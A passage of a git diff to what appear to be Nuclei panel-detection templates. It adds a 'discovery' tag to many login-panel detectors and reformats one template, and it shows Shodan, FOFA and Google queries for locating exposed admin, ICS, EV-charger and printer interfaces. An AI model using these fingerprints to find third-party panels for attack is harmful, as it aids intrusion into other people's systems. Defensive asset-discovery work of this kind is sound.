+14,7 @@ info: fofa-query: title="Directum" product: directum vendor: directum - tags: directum,panel + tags: directum,panel,discovery http: - method: GET diff --git a/http/exposed-panels/discuz-panel.yaml b/http/exposed-panels/discuz-panel.yaml index 98a11673c30..cb804ccf6af 100644 --- a/http/exposed-panels/discuz-panel.yaml +++ b/http/exposed-panels/discuz-panel.yaml @@ -13,7 +13,7 @@ info: product: discuz\\! shodan-query: title:"Discuz!" fofa-query: title="Discuz!" - tags: panel,discuz,detect,login + tags: panel,discuz,detect,login,discovery http: - method: GET diff --git a/http/exposed-panels/django-admin-panel.yaml b/http/exposed-panels/django-admin-panel.yaml index ad198e21946..b2823e1ac7a 100644 --- a/http/exposed-panels/django-admin-panel.yaml +++ b/http/exposed-panels/django-admin-panel.yaml @@ -14,7 +14,7 @@ info: vendor: djangoproject product: django shodan-query: cpe:"cpe:2.3:a:djangoproject:django" || http.title:"Django administration" - tags: panel,django,python,djangoproject,login + tags: panel,django,python,djangoproject,login,discovery http: - method: GET diff --git a/http/exposed-panels/docebo-elearning-panel.yaml b/http/exposed-panels/docebo-elearning-panel.yaml index a6502e9630a..4f901ff7ef6 100644 --- a/http/exposed-panels/docebo-elearning-panel.yaml +++ b/http/exposed-panels/docebo-elearning-panel.yaml @@ -15,7 +15,7 @@ info: fofa-query: title="Docebo E-learning" product: docebo vendor: docebo - tags: panel,docebo + tags: panel,docebo,discovery http: - method: GET diff --git a/http/exposed-panels/dockge-panel.yaml b/http/exposed-panels/dockge-panel.yaml index a8fd6bf4d18..957a0e83e53 100644 --- a/http/exposed-panels/dockge-panel.yaml +++ b/http/exposed-panels/dockge-panel.yaml @@ -17,7 +17,7 @@ info: vendor: dockge.kuma product: dockge shodan-query: title:"Dockge" - tags: panel,dockge,login + tags: panel,dockge,login,discovery http: - method: GET diff --git a/http/exposed-panels/dockwatch-panel.yaml b/http/exposed-panels/dockwatch-panel.yaml index 61c1af4d025..f41ebfcf708 100644 --- a/http/exposed-panels/dockwatch-panel.yaml +++ b/http/exposed-panels/dockwatch-panel.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 fofa-query: icon_hash="1991646591" - tags: panel,login,dockwatch,detect + tags: panel,login,dockwatch,detect,discovery http: - method: GET diff --git a/http/exposed-panels/docuware-panel.yaml b/http/exposed-panels/docuware-panel.yaml index a3a20aa6a88..a3a43b6c2d4 100644 --- a/http/exposed-panels/docuware-panel.yaml +++ b/http/exposed-panels/docuware-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Docuware" - tags: panel,docuware,detect,login + tags: panel,docuware,detect,login,discovery http: - method: GET diff --git a/http/exposed-panels/dokuwiki-panel.yaml b/http/exposed-panels/dokuwiki-panel.yaml index ac7f8b92dee..015d472837f 100644 --- a/http/exposed-panels/dokuwiki-panel.yaml +++ b/http/exposed-panels/dokuwiki-panel.yaml @@ -16,7 +16,7 @@ info: vendor: dokuwiki product: dokuwiki shodan-query: http.html:"/dokuwiki/" - tags: panel,dokuwiki,login + tags: panel,dokuwiki,login,discovery http: - method: GET diff --git a/http/exposed-panels/dolibarr-panel.yaml b/http/exposed-panels/dolibarr-panel.yaml index 524cf2230d0..811de87e147 100644 --- a/http/exposed-panels/dolibarr-panel.yaml +++ b/http/exposed-panels/dolibarr-panel.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Dolibarr" - tags: panel,dolibarr + tags: panel,dolibarr,discovery http: - method: GET diff --git a/http/exposed-panels/doris-panel.yaml b/http/exposed-panels/doris-panel.yaml index 5b12d23b800..62233efab4c 100644 --- a/http/exposed-panels/doris-panel.yaml +++ b/http/exposed-panels/doris-panel.yaml @@ -13,7 +13,7 @@ info: vendor: apache product: doris shodan-query: http.favicon.hash:24048806 - tags: doris,panel,login,detect + tags: doris,panel,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/dotclear-panel.yaml b/http/exposed-panels/dotclear-panel.yaml index 4837beed6ad..d7a99474da0 100644 --- a/http/exposed-panels/dotclear-panel.yaml +++ b/http/exposed-panels/dotclear-panel.yaml @@ -18,7 +18,7 @@ info: - http.title:"dotclear" fofa-query: title="dotclear" google-query: intitle:"dotclear" - tags: panel,dotclear + tags: panel,dotclear,discovery http: - method: GET diff --git a/http/exposed-panels/dotcms-admin-panel.yaml b/http/exposed-panels/dotcms-admin-panel.yaml index b86946b5716..e23f1ee7a1b 100644 --- a/http/exposed-panels/dotcms-admin-panel.yaml +++ b/http/exposed-panels/dotcms-admin-panel.yaml @@ -16,7 +16,7 @@ info: shodan-query: http.title:"dotcms" fofa-query: title="dotcms" google-query: intitle:"dotcms" - tags: panel,dotcms,cms + tags: panel,dotcms,cms,discovery http: - method: GET diff --git a/http/exposed-panels/dplus-dashboard.yaml b/http/exposed-panels/dplus-dashboard.yaml index 0e671ca11c9..85187fd8ca4 100644 --- a/http/exposed-panels/dplus-dashboard.yaml +++ b/http/exposed-panels/dplus-dashboard.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: title:"DPLUS Dashboard" - tags: panel,dplus,exposure + tags: panel,dplus,exposure,discovery http: - method: GET diff --git a/http/exposed-panels/dqs-superadmin-panel.yaml b/http/exposed-panels/dqs-superadmin-panel.yaml index 9e1f840ccc0..099cd659750 100644 --- a/http/exposed-panels/dqs-superadmin-panel.yaml +++ b/http/exposed-panels/dqs-superadmin-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: title:"DQS Superadmin" - tags: panel,dqs,superadmin + tags: panel,dqs,superadmin,discovery http: - method: GET diff --git a/http/exposed-panels/dradis-pro-panel.yaml b/http/exposed-panels/dradis-pro-panel.yaml index 32a288dc914..ee9cf9fd336 100644 --- a/http/exposed-panels/dradis-pro-panel.yaml +++ b/http/exposed-panels/dradis-pro-panel.yaml @@ -17,7 +17,7 @@ info: shodan-query: title:"Dradis Professional Edition" product: dradis vendor: dradisframework - tags: panel,dradis + tags: panel,dradis,discovery http: - method: GET diff --git a/http/exposed-panels/dragonfly-panel.yaml b/http/exposed-panels/dragonfly-panel.yaml index be5b1416344..42bb15dcbde 100644 --- a/http/exposed-panels/dragonfly-panel.yaml +++ b/http/exposed-panels/dragonfly-panel.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 fofa-query: body="logo-dragonfly.png" - tags: dragonfly,panel,login + tags: dragonfly,panel,login,discovery http: - method: GET diff --git a/http/exposed-panels/drawio-flowchartmaker-panel.yaml b/http/exposed-panels/drawio-flowchartmaker-panel.yaml index 3a695ff2997..a246bd34e67 100644 --- a/http/exposed-panels/drawio-flowchartmaker-panel.yaml +++ b/http/exposed-panels/drawio-flowchartmaker-panel.yaml @@ -21,7 +21,7 @@ info: - http.title:"flowchart maker" fofa-query: title="flowchart maker" google-query: intitle:"flowchart maker" - tags: panel,drawio,oss,diagrams + tags: panel,drawio,oss,diagrams,discovery http: - method: GET diff --git a/http/exposed-panels/drone-ci-panel.yaml b/http/exposed-panels/drone-ci-panel.yaml index a40a707364e..3174c59116b 100644 --- a/http/exposed-panels/drone-ci-panel.yaml +++ b/http/exposed-panels/drone-ci-panel.yaml @@ -13,7 +13,7 @@ info: metadata: max-request: 1 shodan-query: http.favicon.hash:1354079303 - tags: panel,droneci,cicd + tags: panel,droneci,cicd,discovery http: - method: GET diff --git a/http/exposed-panels/druid-console-exposure.yaml b/http/exposed-panels/druid-console-exposure.yaml index 842d6d3761f..4250183ce6d 100644 --- a/http/exposed-panels/druid-console-exposure.yaml +++ b/http/exposed-panels/druid-console-exposure.yaml @@ -13,7 +13,7 @@ info: max-request: 1 vendor: alibaba product: druid - tags: panel,alibaba,druid + tags: panel,alibaba,druid,discovery http: - method: GET diff --git a/http/exposed-panels/druid-panel.yaml b/http/exposed-panels/druid-panel.yaml index bfb61de9eaf..4d3901138d2 100644 --- a/http/exposed-panels/druid-panel.yaml +++ b/http/exposed-panels/druid-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 1 vendor: apache product: druid - tags: panel,druid,apache + tags: panel,druid,apache,discovery http: - method: GET diff --git a/http/exposed-panels/drupal-login.yaml b/http/exposed-panels/drupal-login.yaml index d4b82a04e23..90eebae4152 100644 --- a/http/exposed-panels/drupal-login.yaml +++ b/http/exposed-panels/drupal-login.yaml @@ -16,7 +16,7 @@ info: shodan-query: - http.component:"drupal" - cpe:"cpe:2.3:a:drupal:drupal" - tags: panel,drupal + tags: panel,drupal,discovery http: - method: GET diff --git a/http/exposed-panels/dxplanning-panel.yaml b/http/exposed-panels/dxplanning-panel.yaml index d35e9ef44c8..4bdca733b91 100644 --- a/http/exposed-panels/dxplanning-panel.yaml +++ b/http/exposed-panels/dxplanning-panel.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: panel,dxplanning,login,detect + tags: panel,dxplanning,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/dynamicweb-panel.yaml b/http/exposed-panels/dynamicweb-panel.yaml index c9452f41273..2ca6d938f56 100644 --- a/http/exposed-panels/dynamicweb-panel.yaml +++ b/http/exposed-panels/dynamicweb-panel.yaml @@ -13,7 +13,7 @@ info: metadata: max-request: 1 shodan-query: http.component:"Dynamicweb" - tags: panel,dynamicweb + tags: panel,dynamicweb,discovery http: - raw: diff --git a/http/exposed-panels/dynatrace-panel.yaml b/http/exposed-panels/dynatrace-panel.yaml index bf5e9a73ec3..e355c34b85f 100644 --- a/http/exposed-panels/dynatrace-panel.yaml +++ b/http/exposed-panels/dynatrace-panel.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:1828614783 - tags: dynatrace,login,panel + tags: dynatrace,login,panel,discovery http: - method: GET diff --git a/http/exposed-panels/dzzoffice/dzzoffice-install.yaml b/http/exposed-panels/dzzoffice/dzzoffice-install.yaml index 59496aedd16..e2223de0aaa 100644 --- a/http/exposed-panels/dzzoffice/dzzoffice-install.yaml +++ b/http/exposed-panels/dzzoffice/dzzoffice-install.yaml @@ -19,7 +19,7 @@ info: fofa-query: - title="dzzoffice" - icon_hash=-1961736892 - tags: panel,dzzoffice,install + tags: panel,dzzoffice,install,discovery http: - method: GET diff --git a/http/exposed-panels/dzzoffice/dzzoffice-panel.yaml b/http/exposed-panels/dzzoffice/dzzoffice-panel.yaml index a46f8e5e35f..dfb0f1fe09a 100644 --- a/http/exposed-panels/dzzoffice/dzzoffice-panel.yaml +++ b/http/exposed-panels/dzzoffice/dzzoffice-panel.yaml @@ -17,7 +17,7 @@ info: fofa-query: - title="dzzoffice" - icon_hash=-1961736892 - tags: dzzoffice,panel + tags: dzzoffice,panel,discovery http: - method: GET diff --git a/http/exposed-panels/e-mobile-panel.yaml b/http/exposed-panels/e-mobile-panel.yaml index 5bc0648b37b..d62f6c01921 100644 --- a/http/exposed-panels/e-mobile-panel.yaml +++ b/http/exposed-panels/e-mobile-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 3 shodan-query: http.html:"E-Mobile " - tags: panel,e-mobile + tags: panel,e-mobile,discovery http: - method: GET diff --git a/http/exposed-panels/eMerge-panel.yaml b/http/exposed-panels/eMerge-panel.yaml index 239261a4624..d29647fc473 100644 --- a/http/exposed-panels/eMerge-panel.yaml +++ b/http/exposed-panels/eMerge-panel.yaml @@ -19,7 +19,7 @@ info: - http.title:"emerge" fofa-query: title="emerge" google-query: intitle:"emerge" - tags: panel,emerge,nortek,nortekcontrol + tags: panel,emerge,nortek,nortekcontrol,discovery http: - method: GET diff --git a/http/exposed-panels/earcu-panel.yaml b/http/exposed-panels/earcu-panel.yaml index e98cc06aa06..ec9b5dce1ca 100644 --- a/http/exposed-panels/earcu-panel.yaml +++ b/http/exposed-panels/earcu-panel.yaml @@ -11,7 +11,7 @@ info: verified: "true" max-request: 1 shodan-query: html:'content="eArcu' - tags: panel,earcu,detect + tags: panel,earcu,detect,discovery http: - method: GET diff --git a/http/exposed-panels/easyjob-panel.yaml b/http/exposed-panels/easyjob-panel.yaml index b8985caa958..41b3b16e7c7 100644 --- a/http/exposed-panels/easyjob-panel.yaml +++ b/http/exposed-panels/easyjob-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Log in - easyJOB" - tags: panel,easyjob,login + tags: panel,easyjob,login,discovery http: - method: GET diff --git a/http/exposed-panels/easyvista-panel.yaml b/http/exposed-panels/easyvista-panel.yaml index 239ecd14743..e267142a1f4 100644 --- a/http/exposed-panels/easyvista-panel.yaml +++ b/http/exposed-panels/easyvista-panel.yaml @@ -1,5 +1,5 @@ -id: easyvista-panel - +id: easyvista-panel + info: name: EasyVista Login Panel - Detect author: righettod @@ -12,25 +12,25 @@ info: verified: true max-request: 1 shodan-query: http.title:"Easyvista" - tags: panel,easyvista,login,detect + tags: panel,easyvista,login,detect,discovery -http: - - method: GET - path: - - "{{BaseURL}}/index.php" - - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains_any(to_lower(body), "<title>easyvista apps", "easyvista-bundle.min.js", "packages_com_easyvista_core")' - condition: and - - extractors: - - type: regex - part: body - group: 1 - regex: - - '(?i)package:\s+"([a-z0-9._-]+)"' +http: + - method: GET + path: + - "{{BaseURL}}/index.php" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "easyvista apps", "easyvista-bundle.min.js", "packages_com_easyvista_core")' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: + - '(?i)package:\s+"([a-z0-9._-]+)"' - '(?i)version : ([a-z0-9._-]+)' # digest: 4a0a004730450220412201b541bde367584d18e46d5a5a8c226ae2ae86b0465f64e7c8840ec466eb0221008ba279d677e82fd9ec759632749f7d05546dc9ee7ff1ba440f180a50fdbb2593:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/eclipse-birt-panel.yaml b/http/exposed-panels/eclipse-birt-panel.yaml index 9edd77d9ebe..71376e35b33 100644 --- a/http/exposed-panels/eclipse-birt-panel.yaml +++ b/http/exposed-panels/eclipse-birt-panel.yaml @@ -18,7 +18,7 @@ info: google-query: intitle:"Eclipse BIRT Home" product: business_intelligence_and_reporting_tools vendor: eclipse - tags: panel,eclipsebirt,detect + tags: panel,eclipsebirt,detect,discovery http: - method: GET diff --git a/http/exposed-panels/ecosys-command-center.yaml b/http/exposed-panels/ecosys-command-center.yaml index c4c872f0cdd..1a2ca36efa3 100644 --- a/http/exposed-panels/ecosys-command-center.yaml +++ b/http/exposed-panels/ecosys-command-center.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,printer,ecosys,iot + tags: panel,printer,ecosys,iot,discovery http: - method: GET diff --git a/http/exposed-panels/edgeos-login.yaml b/http/exposed-panels/edgeos-login.yaml index a5dcadc5cc3..41cad57383d 100644 --- a/http/exposed-panels/edgeos-login.yaml +++ b/http/exposed-panels/edgeos-login.yaml @@ -13,7 +13,7 @@ info: max-request: 1 vendor: ui product: edgeos - tags: login,tech,edgeos,edgemax,panel,ui + tags: login,tech,edgeos,edgemax,panel,ui,discovery http: - method: GET diff --git a/http/exposed-panels/efak-login-panel.yaml b/http/exposed-panels/efak-login-panel.yaml index fdd3613530a..970bf6d2afb 100644 --- a/http/exposed-panels/efak-login-panel.yaml +++ b/http/exposed-panels/efak-login-panel.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 2 shodan-query: http.favicon.hash:1693580324 - tags: panel,efak,login,detect + tags: panel,efak,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/ekare-insight-panel.yaml b/http/exposed-panels/ekare-insight-panel.yaml index 86a4a7636ac..027a60cbacf 100644 --- a/http/exposed-panels/ekare-insight-panel.yaml +++ b/http/exposed-panels/ekare-insight-panel.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true fofa-query: icon_hash="125375398" - tags: panel,login,ekare,insight + tags: panel,login,ekare,insight,discovery http: - method: GET diff --git a/http/exposed-panels/eko-management-console-login.yaml b/http/exposed-panels/eko-management-console-login.yaml index 6ba560c4979..083eb0e5e12 100644 --- a/http/exposed-panels/eko-management-console-login.yaml +++ b/http/exposed-panels/eko-management-console-login.yaml @@ -15,7 +15,7 @@ info: max-request: 1 shodan-query: http.title:"Charger Management Console" google-query: intitle:"Charger Management Console" - tags: panel,eko + tags: panel,eko,discovery http: - method: GET diff --git a/http/exposed-panels/eko-software-update-panel.yaml b/http/exposed-panels/eko-software-update-panel.yaml index e32c3aed2d8..5548e8aff84 100644 --- a/http/exposed-panels/eko-software-update-panel.yaml +++ b/http/exposed-panels/eko-software-update-panel.yaml @@ -14,7 +14,7 @@ info: max-request: 1 shodan-query: http.title:"Ekoenergetyka-Polska Sp. z o.o - CCU3 Software Update for Embedded Systems" google-query: intitle:"Ekoenergetyka-Polska Sp. z o.o - CCU3 Software Update for Embedded Systems" - tags: panel,eko + tags: panel,eko,discovery http: - method: GET diff --git a/http/exposed-panels/elemiz-network-manager.yaml b/http/exposed-panels/elemiz-network-manager.yaml index c3cec9d18e7..32d11c8bc51 100644 --- a/http/exposed-panels/elemiz-network-manager.yaml +++ b/http/exposed-panels/elemiz-network-manager.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: title:"Elemiz Network Manager" - tags: elemiz,manager,login,panel + tags: elemiz,manager,login,panel,discovery http: - method: GET diff --git a/http/exposed-panels/emby-panel.yaml b/http/exposed-panels/emby-panel.yaml index 90ca1485a1d..3bac31361aa 100644 --- a/http/exposed-panels/emby-panel.yaml +++ b/http/exposed-panels/emby-panel.yaml @@ -21,7 +21,7 @@ info: shodan-query: http.title:"emby" fofa-query: title="emby" google-query: intitle:"emby" - tags: panel,emby,oss + tags: panel,emby,oss,discovery http: - method: GET diff --git a/http/exposed-panels/emerson-power-panel.yaml b/http/exposed-panels/emerson-power-panel.yaml index 95a5ce1a010..375239ed551 100644 --- a/http/exposed-panels/emerson-power-panel.yaml +++ b/http/exposed-panels/emerson-power-panel.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Emerson Network Power IntelliSlot Web Card" - tags: panel,intellislot,emerson + tags: panel,intellislot,emerson,discovery http: - method: GET diff --git a/http/exposed-panels/emessage-panel.yaml b/http/exposed-panels/emessage-panel.yaml index 816a935c47d..cba9b222a7f 100644 --- a/http/exposed-panels/emessage-panel.yaml +++ b/http/exposed-panels/emessage-panel.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 fofa-query: title="emessage" - tags: panel,emessage + tags: panel,emessage,discovery http: - method: GET diff --git a/http/exposed-panels/emqx-panel.yaml b/http/exposed-panels/emqx-panel.yaml index 602f1f8149c..bbed5365ab6 100644 --- a/http/exposed-panels/emqx-panel.yaml +++ b/http/exposed-panels/emqx-panel.yaml @@ -16,7 +16,7 @@ info: vendor: emqx product: emqx shodan-query: http.title:"EMQX Dashboard" - tags: panel,emqx,login,detect + tags: panel,emqx,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/ems-login-panel.yaml b/http/exposed-panels/ems-login-panel.yaml index 3b16472bf7a..35128fbaf3d 100644 --- a/http/exposed-panels/ems-login-panel.yaml +++ b/http/exposed-panels/ems-login-panel.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,ems,login + tags: panel,ems,login,discovery http: - method: GET diff --git a/http/exposed-panels/ems-webclient-panel.yaml b/http/exposed-panels/ems-webclient-panel.yaml index 96db29a35c7..44fd4980585 100644 --- a/http/exposed-panels/ems-webclient-panel.yaml +++ b/http/exposed-panels/ems-webclient-panel.yaml @@ -14,7 +14,7 @@ info: google-query: inurl:EMSWebClient/ product: ems vendor: ems_project - tags: panel,ems + tags: panel,ems,discovery http: - method: GET diff --git a/http/exposed-panels/enablix-panel.yaml b/http/exposed-panels/enablix-panel.yaml index 8ba7341bd94..48ea8310a98 100644 --- a/http/exposed-panels/enablix-panel.yaml +++ b/http/exposed-panels/enablix-panel.yaml @@ -9,7 +9,7 @@ info: metadata: max-request: 1 shodan-query: title:"Enablix" - tags: enablix,login,panel + tags: enablix,login,panel,discovery http: - method: GET diff --git a/http/exposed-panels/endpoint-protector-panel.yaml b/http/exposed-panels/endpoint-protector-panel.yaml index 8052fa0dfbe..de6fbe97005 100644 --- a/http/exposed-panels/endpoint-protector-panel.yaml +++ b/http/exposed-panels/endpoint-protector-panel.yaml @@ -14,7 +14,7 @@ info: vendor: cososys product: endpoint_protector shodan-query: http.title:"Endpoint Protector" - tags: panel,endpoint,login,detect,endpoint-protector + tags: panel,endpoint,login,detect,endpoint-protector,discovery http: - method: GET diff --git a/http/exposed-panels/entrust-identityguard.yaml b/http/exposed-panels/entrust-identityguard.yaml index b3fe7da9503..a8e8c00642e 100644 --- a/http/exposed-panels/entrust-identityguard.yaml +++ b/http/exposed-panels/entrust-identityguard.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,identityguard + tags: panel,identityguard,discovery http: - method: GET diff --git a/http/exposed-panels/eos-http-browser.yaml b/http/exposed-panels/eos-http-browser.yaml index bfd028fdb84..e91013a5dde 100644 --- a/http/exposed-panels/eos-http-browser.yaml +++ b/http/exposed-panels/eos-http-browser.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 2 shodan-query: title:"EOS HTTP Browser" - tags: exposure,eos,httpbrowser,panel + tags: exposure,eos,httpbrowser,panel,discovery http: - method: GET diff --git a/http/exposed-panels/episerver-panel.yaml b/http/exposed-panels/episerver-panel.yaml index e6d8037e02d..a28e97edc6f 100644 --- a/http/exposed-panels/episerver-panel.yaml +++ b/http/exposed-panels/episerver-panel.yaml @@ -17,7 +17,7 @@ info: shodan-query: html:"epihash" product: episerver vendor: episerver - tags: panel,optimizely,episerver + tags: panel,optimizely,episerver,discovery http: - method: GET diff --git a/http/exposed-panels/epson-access-detect.yaml b/http/exposed-panels/epson-access-detect.yaml index 8095222e6e5..75925a6c2c4 100644 --- a/http/exposed-panels/epson-access-detect.yaml +++ b/http/exposed-panels/epson-access-detect.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-668 metadata: max-request: 1 - tags: iot,printer,panel,unauth,epson,edb + tags: iot,printer,panel,unauth,epson,edb,discovery http: - method: GET diff --git a/http/exposed-panels/epson-projector-detect.yaml b/http/exposed-panels/epson-projector-detect.yaml index 4f3ebff082e..3e23ade2643 100644 --- a/http/exposed-panels/epson-projector-detect.yaml +++ b/http/exposed-panels/epson-projector-detect.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 fofa-query: cgi-bin/webconf.exe - tags: iot,projector,panel,unauth,epson + tags: iot,projector,panel,unauth,epson,discovery http: - method: GET diff --git a/http/exposed-panels/epson-web-control-detect.yaml b/http/exposed-panels/epson-web-control-detect.yaml index 81c4e23dc42..46330c0174c 100644 --- a/http/exposed-panels/epson-web-control-detect.yaml +++ b/http/exposed-panels/epson-web-control-detect.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,unauth,epson,edb,iot,printer + tags: panel,unauth,epson,edb,iot,printer,discovery http: - method: GET diff --git a/http/exposed-panels/eset-protect-panel.yaml b/http/exposed-panels/eset-protect-panel.yaml index 1a6e7b972a0..1a6a51e5a1b 100644 --- a/http/exposed-panels/eset-protect-panel.yaml +++ b/http/exposed-panels/eset-protect-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:751911084 - tags: login,eset,panel,detect + tags: login,eset,panel,detect,discovery http: - method: GET diff --git a/http/exposed-panels/espec-web-controller-panel.yaml b/http/exposed-panels/espec-web-controller-panel.yaml index 3e248eb8d19..be1f5d0f459 100644 --- a/http/exposed-panels/espec-web-controller-panel.yaml +++ b/http/exposed-panels/espec-web-controller-panel.yaml @@ -18,7 +18,7 @@ info: fofa-query: - title="Espec Web Controller" - icon_hash="1190353375" - tags: panel,espec,ics,login + tags: panel,espec,ics,login,discovery http: - method: GET diff --git a/http/exposed-panels/esphome-panel.yaml b/http/exposed-panels/esphome-panel.yaml index 9ca06d5b340..2f84688b345 100644 --- a/http/exposed-panels/esphome-panel.yaml +++ b/http/exposed-panels/esphome-panel.yaml @@ -19,7 +19,7 @@ info: - http.title:"login - esphome" fofa-query: title="login - esphome" google-query: intitle:"login - esphome" - tags: panel,esphome,iot + tags: panel,esphome,iot,discovery http: - method: GET diff --git a/http/exposed-panels/esxi-system.yaml b/http/exposed-panels/esxi-system.yaml index f7912442e7b..d71cb875c23 100644 --- a/http/exposed-panels/esxi-system.yaml +++ b/http/exposed-panels/esxi-system.yaml @@ -18,7 +18,7 @@ info: - http.html:"esxuiapp" - cpe:"cpe:2.3:o:vmware:esxi" fofa-query: body="esxuiapp" - tags: panel,esxi,vmware + tags: panel,esxi,vmware,discovery http: - method: GET diff --git a/http/exposed-panels/eventum-panel.yaml b/http/exposed-panels/eventum-panel.yaml index f0bc57d7e29..bbfb942b5b0 100644 --- a/http/exposed-panels/eventum-panel.yaml +++ b/http/exposed-panels/eventum-panel.yaml @@ -16,7 +16,7 @@ info: product: eventum shodan-query: http.favicon.hash:305412257 fofa-query: icon_hash=305412257 - tags: panel,eventum,mysql + tags: panel,eventum,mysql,discovery http: - method: GET diff --git a/http/exposed-panels/evlink/evlink-panel.yaml b/http/exposed-panels/evlink/evlink-panel.yaml index 873cba0761b..09866455afc 100644 --- a/http/exposed-panels/evlink/evlink-panel.yaml +++ b/http/exposed-panels/evlink/evlink-panel.yaml @@ -9,7 +9,7 @@ info: max-request: 1 shodan-query: title:"EVlink Local Controller" fofa-query: title="EVlink Local Controller" - tags: panel,evlink,login,detect + tags: panel,evlink,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/evlink/evse-web-panel.yaml b/http/exposed-panels/evlink/evse-web-panel.yaml index cfdb1d0e1ae..63eb0dd03a1 100644 --- a/http/exposed-panels/evlink/evse-web-panel.yaml +++ b/http/exposed-panels/evlink/evse-web-panel.yaml @@ -18,7 +18,7 @@ info: - title="EVSE Web Interface" - title="evse web interface" google-query: intitle:"evse web interface" - tags: panel,evlink,evse,login,detect,schneider-electric + tags: panel,evlink,evse,login,detect,schneider-electric,discovery http: - method: GET diff --git a/http/exposed-panels/ewm-manager-panel.yaml b/http/exposed-panels/ewm-manager-panel.yaml index 5a8325ecbbc..f36cb114a94 100644 --- a/http/exposed-panels/ewm-manager-panel.yaml +++ b/http/exposed-panels/ewm-manager-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"EWM Manager" - tags: ewm,manager,login,panel + tags: ewm,manager,login,panel,discovery http: - method: GET diff --git a/http/exposed-panels/exagrid-manager-panel.yaml b/http/exposed-panels/exagrid-manager-panel.yaml index 66f269dc068..8e7e64e5e55 100644 --- a/http/exposed-panels/exagrid-manager-panel.yaml +++ b/http/exposed-panels/exagrid-manager-panel.yaml @@ -19,7 +19,7 @@ info: - http.title:"exagrid manager" fofa-query: title="exagrid manager" google-query: intitle:"exagrid manager" - tags: exagrid,manager,login,panel + tags: exagrid,manager,login,panel,discovery http: - method: GET diff --git a/http/exposed-panels/exolis-engage-panel.yaml b/http/exposed-panels/exolis-engage-panel.yaml index de25fd27a59..04b03787b0c 100644 --- a/http/exposed-panels/exolis-engage-panel.yaml +++ b/http/exposed-panels/exolis-engage-panel.yaml @@ -15,7 +15,7 @@ info: max-request: 1 shodan-query: html:"engage - Portail soignant" google-query: intitle:"engage - Portail soignant" - tags: panel,exolis,engage + tags: panel,exolis,engage,discovery http: - method: GET diff --git a/http/exposed-panels/exposed-webalizer.yaml b/http/exposed-panels/exposed-webalizer.yaml index ef5390d05b3..688ff02f22c 100644 --- a/http/exposed-panels/exposed-webalizer.yaml +++ b/http/exposed-panels/exposed-webalizer.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 google-query: intext:"webalizer" intext:"Usage Statistics for" - tags: panel,webalizer,edb + tags: panel,webalizer,edb,discovery http: - method: GET diff --git a/http/exposed-panels/extreme-netconfig-ui.yaml b/http/exposed-panels/extreme-netconfig-ui.yaml index 07b67d08ed7..87a82bafef1 100644 --- a/http/exposed-panels/extreme-netconfig-ui.yaml +++ b/http/exposed-panels/extreme-netconfig-ui.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Extreme NetConfig UI" - tags: panel,tech,hiveos,extreme + tags: panel,tech,hiveos,extreme,discovery http: - method: GET diff --git a/http/exposed-panels/extron-cms-panel.yaml b/http/exposed-panels/extron-cms-panel.yaml index e2414e2d009..3835fb7e0d4 100644 --- a/http/exposed-panels/extron-cms-panel.yaml +++ b/http/exposed-panels/extron-cms-panel.yaml @@ -22,7 +22,7 @@ info: - app="Ektron-CMS" - app="ektron-cms" - body="ektron" - tags: panel,ektron,cms + tags: panel,ektron,cms,discovery http: - method: GET diff --git a/http/exposed-panels/ez-publish-panel.yaml b/http/exposed-panels/ez-publish-panel.yaml index a0cba9a9e82..45a7efa82d5 100644 --- a/http/exposed-panels/ez-publish-panel.yaml +++ b/http/exposed-panels/ez-publish-panel.yaml @@ -15,7 +15,7 @@ info: shodan-query: http.html:"eZ Publish" product: ez_publish vendor: ez - tags: panel,ez + tags: panel,ez,discovery http: - method: GET diff --git a/http/exposed-panels/f-secure-policy-manager.yaml b/http/exposed-panels/f-secure-policy-manager.yaml index 00cb9a7a203..4898d01bec9 100644 --- a/http/exposed-panels/f-secure-policy-manager.yaml +++ b/http/exposed-panels/f-secure-policy-manager.yaml @@ -18,7 +18,7 @@ info: - http.title:"f-secure policy manager server" fofa-query: title="f-secure policy manager server" google-query: intitle:"f-secure policy manager server" - tags: login,panel,withsecure + tags: 